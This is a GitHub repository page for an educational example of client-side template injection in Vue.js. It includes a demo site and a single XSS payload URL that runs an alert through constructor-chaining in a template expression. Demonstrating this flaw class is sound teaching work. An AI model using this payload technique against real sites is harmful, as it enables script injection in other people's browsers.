Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
server		server
.gitignore		.gitignore
.nowignore		.nowignore
README.md		README.md
now.json		now.json
package.json		package.json
yarn.lock		yarn.lock

Repository files navigation

Client-Side Template Injection

An example of client-side template injection with Vue.js

Clarification

This is not a problem with Vue itself.

For more details, see the following issue.

Clarification · Issue #2 · azu/vue-client-side-template-injection-example

Site

https://vue-client-side-template-injection-example.azu.now.sh/?name=xxx

Payload

XSS Payload

https://vue-client-side-template-injection-example.azu.now.sh/?name={{this.constructor.constructor('alert("foo")')()}}

About

Example: Client-Side Template Injection with Vue

vue-client-side-template-injection-example.azu.now.sh/?name=test

Code of conduct

Security policy

Report repository

Releases

No releases published

Sponsor this project

Learn more about GitHub Sponsors

Packages

No packages published

Languages

JavaScript 100.0%